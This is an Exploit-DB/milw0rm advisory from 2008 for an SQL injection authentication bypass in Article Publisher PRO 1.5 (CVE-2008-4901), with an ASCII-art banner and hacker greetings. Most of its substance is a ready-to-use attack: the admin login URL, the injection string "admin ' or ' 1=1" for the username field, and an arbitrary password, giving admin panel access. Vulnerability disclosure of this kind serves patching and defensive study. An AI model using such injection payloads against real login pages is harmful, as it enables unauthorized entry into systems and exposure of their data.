Article Publisher PRO 1.5 SQL Injection Auth Bypass Vulnerability

2008-10-31T00:00:00
ID EDB-ID:6912
Type exploitdb
Reporter Hakxer
Modified 2008-10-31T00:00:00

Description

Article Publisher PRO 1.5 (SQL Injection) Auth Bypass Vulnerability. CVE-2008-4901. Webapps exploit for php platform

                                        
                                            ###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/                                           

# Discovered by : Hakxer
# Type Gap : Bybass Login
# Script : Article Publisher Pro : http://www.phparticlescript.com/
# Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
##########################################################################

[~] Go to http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
[~] Exploit 
[~] In Username Write : admin ' or ' 1=1
[~] In Password Write any thing Example : Hakxer
[~] Click Login ..! Now You Are In admin panel

# Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-10-31]